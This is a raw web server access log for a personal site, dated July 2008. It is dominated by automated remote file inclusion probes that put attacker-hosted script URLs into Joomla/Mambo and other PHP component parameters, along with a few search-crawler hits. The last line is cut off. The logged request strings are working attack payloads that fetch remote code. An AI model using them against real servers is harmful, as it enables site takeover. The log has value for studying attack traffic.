62.244.71.72 - - [13/Jul/2008:14:27:52 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://arabhack.110mb.com/kngid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.18.76 - - [13/Jul/2008:14:27:53 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.18.76 - - [13/Jul/2008:14:27:59 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.18.76 - - [13/Jul/2008:14:27:59 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.244.71.72 - - [13/Jul/2008:14:28:07 -0700] "GET /logs/access_080315.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.244.71.72 - - [13/Jul/2008:14:28:08 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.244.71.72 - - [13/Jul/2008:14:28:09 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
205.234.197.170 - - [13/Jul/2008:14:29:38 -0700] "GET /logs/access_080117.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.geocities.com/d3dy1/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
203.146.170.160 - - [13/Jul/2008:14:29:38 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.iglesialcs.cl/newweb//images/stories/.bash/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
205.234.197.170 - - [13/Jul/2008:14:29:38 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.geocities.com/d3dy1/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
205.234.197.170 - - [13/Jul/2008:14:29:38 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.geocities.com/d3dy1/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
206.117.237.200 - - [13/Jul/2008:14:29:44 -0700] "GET /logs/access.log/lostpasswd.php?env[include_prefix]=http://www.shaker-diffusion.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.117.237.200 - - [13/Jul/2008:14:29:44 -0700] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.shaker-diffusion.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.117.237.200 - - [13/Jul/2008:14:29:44 -0700] "GET /lostpasswd.php?env[include_prefix]=http://www.shaker-diffusion.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.117.237.200 - - [13/Jul/2008:14:29:49 -0700] "GET /logs/access_080329.log/lostpasswd.php?env[include_prefix]=http://www.shaker-diffusion.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.244.71.72 - - [13/Jul/2008:14:30:09 -0700] "GET /logs/access.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://arabhack.110mb.com/kngid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.101.24 - - [13/Jul/2008:14:30:14 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.101.24 - - [13/Jul/2008:14:30:15 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
205.234.197.170 - - [13/Jul/2008:14:30:16 -0700] "GET /logs/access.log/bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.geocities.com/d3dy1/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
205.234.197.170 - - [13/Jul/2008:14:30:16 -0700] "GET /bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.geocities.com/d3dy1/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
205.234.197.170 - - [13/Jul/2008:14:30:16 -0700] "GET /logs/bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.geocities.com/d3dy1/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
200.169.18.172 - - [13/Jul/2008:14:30:17 -0700] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.geocities.com/boy_nozz/taf/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.169.18.172 - - [13/Jul/2008:14:30:17 -0700] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.geocities.com/boy_nozz/taf/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
194.79.75.195 - - [13/Jul/2008:14:30:19 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.geocities.com/sofiawila/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
194.79.75.195 - - [13/Jul/2008:14:30:20 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.geocities.com/sofiawila/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
62.244.71.72 - - [13/Jul/2008:14:30:20 -0700] "GET /logs/access.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.18.242.34 - - [13/Jul/2008:14:30:54 -0700] "GET /logs//?path%5Bdocroot%5D=http://queb3.info/cruise/idi.txt??? HTTP/1.1" 200 55998 "-" "libwww-perl/5.805" "www.dmulk.com"
212.34.140.215 - - [13/Jul/2008:14:30:56 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.34.140.215 - - [13/Jul/2008:14:30:56 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
86.59.35.146 - - [13/Jul/2008:14:31:00 -0700] "GET //include/functions_common.php?gl_root_path=http://paginas.terra.com.br/lazer/xfatalityx/NewCmd.txt?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
86.59.35.146 - - [13/Jul/2008:14:31:00 -0700] "GET /logs//include/functions_common.php?gl_root_path=http://paginas.terra.com.br/lazer/xfatalityx/NewCmd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
202.174.82.134 - - [13/Jul/2008:14:31:02 -0700] "GET /logs/access_080313.log/index.php?sourcedir=http://kitchensaver.biz//catalog/images/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.18.242.34 - - [13/Jul/2008:14:31:07 -0700] "GET //?path%5Bdocroot%5D=http://queb3.info/cruise/idi.txt??? HTTP/1.1" 200 18407 "-" "libwww-perl/5.805" "www.dmulk.com"
202.174.82.134 - - [13/Jul/2008:14:31:10 -0700] "GET /logs/access_080313.log/index.php?sourcedir=http://kitchensaver.biz//catalog/images/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.195.52.38 - - [13/Jul/2008:14:31:13 -0700] "GET /blog/index.php/2008/06/07/westoc-2008-preparation-thank-you-byron/feed/ HTTP/1.0" 200 1688 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
195.70.36.107 - - [13/Jul/2008:14:31:16 -0700] "GET /logs/access_080315.log//includes/functions_admin.php?phpbb_root_path=http://www.coronaclub.it/pk_gallery/photos/25/11828333/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.141.173.75 - - [13/Jul/2008:14:31:19 -0700] "GET /logs/access.log//sohoadmin/program/modules/includes/login.php?_SESSION[docroot_path]=http://www.proostjes.be/calendar/help01.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.141.173.75 - - [13/Jul/2008:14:31:19 -0700] "GET /logs//sohoadmin/program/modules/includes/login.php?_SESSION[docroot_path]=http://www.proostjes.be/calendar/help01.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.141.173.75 - - [13/Jul/2008:14:31:21 -0700] "GET //sohoadmin/program/modules/includes/login.php?_SESSION[docroot_path]=http://www.proostjes.be/calendar/help01.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
86.59.35.146 - - [13/Jul/2008:14:31:23 -0700] "GET //ray/modules/global/inc/content.inc.php?sIncPath=http://paginas.terra.com.br/lazer/xfatalityx/NewCmd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
86.59.35.146 - - [13/Jul/2008:14:31:23 -0700] "GET /logs//ray/modules/global/inc/content.inc.php?sIncPath=http://paginas.terra.com.br/lazer/xfatalityx/NewCmd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
205.234.197.170 - - [13/Jul/2008:14:31:23 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.geocities.com/d3dy1/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
200.68.51.152 - - [13/Jul/2008:14:31:45 -0700] "GET /logs/access.log/lostpasswd.php?env[include_prefix]=http://queb3.info/cruise/gha-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.68.51.152 - - [13/Jul/2008:14:31:46 -0700] "GET /lostpasswd.php?env[include_prefix]=http://queb3.info/cruise/gha-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.68.51.152 - - [13/Jul/2008:14:31:46 -0700] "GET /logs/lostpasswd.php?env[include_prefix]=http://queb3.info/cruise/gha-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.79.75.195 - - [13/Jul/2008:14:32:01 -0700] "GET /logs//?mosConfig_absolute_path=http://www.geocities.com/elsiavaria/test.txt??? HTTP/1.1" 200 55998 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
194.79.75.195 - - [13/Jul/2008:14:32:02 -0700] "GET //?mosConfig_absolute_path=http://www.geocities.com/elsiavaria/test.txt??? HTTP/1.1" 200 18427 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
87.106.18.76 - - [13/Jul/2008:14:32:08 -0700] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.18.76 - - [13/Jul/2008:14:32:14 -0700] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.18.76 - - [13/Jul/2008:14:32:14 -0700] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.18.76 - - [13/Jul/2008:14:32:20 -0700] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
205.234.197.170 - - [13/Jul/2008:14:32:38 -0700] "GET /logs/access_080329.log/bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.geocities.com/d3dy1/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
212.227.65.79 - - [13/Jul/2008:14:32:48 -0700] "GET /logs/access_080313.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.degorzen.nl/Joomla/mambots/editors/htmlarea2/popups/albid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
212.227.65.79 - - [13/Jul/2008:14:32:48 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.degorzen.nl/Joomla/mambots/editors/htmlarea2/popups/albid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
212.227.65.79 - - [13/Jul/2008:14:32:49 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.degorzen.nl/Joomla/mambots/editors/htmlarea2/popups/albid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
205.234.197.170 - - [13/Jul/2008:14:32:50 -0700] "GET /bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.geocities.com/d3dy1/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
200.68.51.152 - - [13/Jul/2008:14:33:06 -0700] "GET /logs/access_080329.log/lostpasswd.php?env[include_prefix]=http://queb3.info/cruise/gha-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.195.52.83 - - [13/Jul/2008:14:33:10 -0700] "GET /blog/index.php/2008/06/05/crestoc-2008-5302008-612008/ HTTP/1.0" 200 7890 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
205.234.197.170 - - [13/Jul/2008:14:33:19 -0700] "GET /logs/access_080322.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.geocities.com/d3dy1/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
212.227.65.79 - - [13/Jul/2008:14:33:38 -0700] "GET /logs/access.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.degorzen.nl/Joomla/mambots/editors/htmlarea2/popups/albid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
206.117.237.200 - - [13/Jul/2008:14:33:44 -0700] "GET /logs/access.log%20/lostpasswd.php?env[include_prefix]=http://www.shaker-diffusion.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.232.156.10 - - [13/Jul/2008:14:33:50 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.beatthevegasbook.com/images/response??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
66.232.156.10 - - [13/Jul/2008:14:33:50 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.beatthevegasbook.com/images/response??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
85.234.133.173 - - [13/Jul/2008:14:34:12 -0700] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://legalref.ru/config/idscan.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
85.234.133.173 - - [13/Jul/2008:14:34:13 -0700] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://legalref.ru/config/idscan.txt? HTTP/1.1" 200 18507 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
66.7.203.122 - - [13/Jul/2008:14:34:25 -0700] "GET /logs/access_080303.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.mojir.com/el/moodledata/site/read??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
200.68.51.152 - - [13/Jul/2008:14:35:08 -0700] "GET /lostpasswd.php?env[include_prefix]=http://queb3.info/cruise/gha-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.134.105.107 - - [13/Jul/2008:14:35:50 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://h1.ripway.com/udpflood/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.134.105.107 - - [13/Jul/2008:14:35:51 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://h1.ripway.com/udpflood/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.246.7.92 - - [13/Jul/2008:14:36:01 -0700] "GET /logs/access_080212.log/avatar.php?page=http://www.geocities.com/fexcia/kngid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.246.7.92 - - [13/Jul/2008:14:36:01 -0700] "GET /avatar.php?page=http://www.geocities.com/fexcia/kngid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.246.7.92 - - [13/Jul/2008:14:36:01 -0700] "GET /logs/avatar.php?page=http://www.geocities.com/fexcia/kngid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
201.130.79.34 - - [13/Jul/2008:14:36:09 -0700] "GET /logs/access_080212.log/avatar.php?page=http://arabhack.110mb.com/kngid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.130.79.34 - - [13/Jul/2008:14:36:09 -0700] "GET /logs/access_080212.log/avatar.php?page=http://www.geocities.com/fexcia/kngid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.130.79.34 - - [13/Jul/2008:14:36:09 -0700] "GET /avatar.php?page=http://arabhack.110mb.com/kngid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.130.79.34 - - [13/Jul/2008:14:36:10 -0700] "GET /avatar.php?page=http://www.geocities.com/fexcia/kngid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.130.79.34 - - [13/Jul/2008:14:36:10 -0700] "GET /logs/avatar.php?page=http://arabhack.110mb.com/kngid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.130.79.34 - - [13/Jul/2008:14:36:10 -0700] "GET /logs/avatar.php?page=http://www.geocities.com/fexcia/kngid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.130.79.34 - - [13/Jul/2008:14:36:11 -0700] "GET /logs/access_080212.log/avatar.php?page=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.130.79.34 - - [13/Jul/2008:14:36:11 -0700] "GET /avatar.php?page=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.130.79.34 - - [13/Jul/2008:14:36:11 -0700] "GET /logs/avatar.php?page=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.89.31.195 - - [13/Jul/2008:14:36:12 -0700] "GET /logs/access_080212.log/avatar.php?page=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.31.195 - - [13/Jul/2008:14:36:12 -0700] "GET /avatar.php?page=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.31.195 - - [13/Jul/2008:14:36:12 -0700] "GET /logs/avatar.php?page=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.31.195 - - [13/Jul/2008:14:36:14 -0700] "GET /logs/access_080212.log/avatar.php?page=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.31.195 - - [13/Jul/2008:14:36:14 -0700] "GET /avatar.php?page=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.31.195 - - [13/Jul/2008:14:36:14 -0700] "GET /logs/avatar.php?page=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.37.237.58 - - [13/Jul/2008:14:37:16 -0700] "GET /logs/access_080212.log/avatar.php?page=http://arabhack.110mb.com/kngid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.37.237.58 - - [13/Jul/2008:14:37:16 -0700] "GET /avatar.php?page=http://arabhack.110mb.com/kngid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.37.237.58 - - [13/Jul/2008:14:37:17 -0700] "GET /logs/avatar.php?page=http://arabhack.110mb.com/kngid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.37.237.58 - - [13/Jul/2008:14:37:56 -0700] "GET /logs/access_080212.log/avatar.php?page=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.37.237.58 - - [13/Jul/2008:14:37:56 -0700] "GET /avatar.php?page=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.37.237.58 - - [13/Jul/2008:14:37:56 -0700] "GET /logs/avatar.php?page=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.130.79.34 - - [13/Jul/2008:14:38:44 -0700] "GET /logs/access.log//include/footer.inc.php?_AMLconfig[cfg_serverpath]=http://dj.caucasus.net/V2008ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.130.79.34 - - [13/Jul/2008:14:38:44 -0700] "GET //include/footer.inc.php?_AMLconfig[cfg_serverpath]=http://dj.caucasus.net/V2008ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.130.79.34 - - [13/Jul/2008:14:38:45 -0700] "GET /logs//include/footer.inc.php?_AMLconfig[cfg_serverpath]=http://dj.caucasus.net/V2008ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.141.173.75 - - [13/Jul/2008:14:38:56 -0700] "GET /logs/access_080117.log//sohoadmin/program/modules/includes/login.php?_SESSION[docroot_path]=http://www.proostjes.be/calendar/help01.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.7.203.122 - - [13/Jul/2008:14:39:29 -0700] "GET /logs/access_080214.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.mojir.com/el/moodledata/site/read??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
204.15.10.22 - - [13/Jul/2008:14:40:21 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
204.15.10.22 - - [13/Jul/2008:14:40:21 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
64.72.112.223 - - [13/Jul/2008:14:40:59 -0700] "GET /logs/index.php?abs_path=http://www.hotelberberys.pl/includes/domit/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
64.72.112.223 - - [13/Jul/2008:14:41:06 -0700] "GET /index.php?abs_path=http://www.hotelberberys.pl/includes/domit/ips.txt? HTTP/1.1" 200 18433 "-" "libwww-perl/5.800" "www.dmulk.com"
82.165.253.62 - - [13/Jul/2008:14:41:18 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.rostop.com/zerocool/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
82.165.253.62 - - [13/Jul/2008:14:41:18 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.rostop.com/zerocool/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
83.103.23.40 - - [13/Jul/2008:14:41:37 -0700] "GET /logs/main.php?x=ftp://81.177.8.194/Upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.103.23.40 - - [13/Jul/2008:14:41:38 -0700] "GET /logs/main.php?x=ftp://81.177.8.194/Upload/trem/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.103.23.40 - - [13/Jul/2008:14:41:38 -0700] "GET /main.php?x=ftp://81.177.8.194/Upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.103.23.40 - - [13/Jul/2008:14:41:38 -0700] "GET /main.php?x=ftp://81.177.8.194/Upload/trem/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.178.228.12 - - [13/Jul/2008:14:41:50 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
193.178.228.12 - - [13/Jul/2008:14:41:50 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
200.29.4.54 - - [13/Jul/2008:14:41:54 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://gang11.co.cc/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.29.4.54 - - [13/Jul/2008:14:41:59 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://gang11.co.cc/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.246.7.92 - - [13/Jul/2008:14:42:06 -0700] "GET /logs/access_080326.log/avatar.php?page=http://www.geocities.com/fexcia/kngid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.195.51.247 - - [13/Jul/2008:14:42:07 -0700] "GET /blog/index.php/2008/04/12/great-day-for-a-ride/trackback/ HTTP/1.0" 200 11510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
82.165.253.62 - - [13/Jul/2008:14:42:12 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.rostop.com/zerocool/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
82.165.253.62 - - [13/Jul/2008:14:42:12 -0700] "GET //admin/classes/TplLoad.php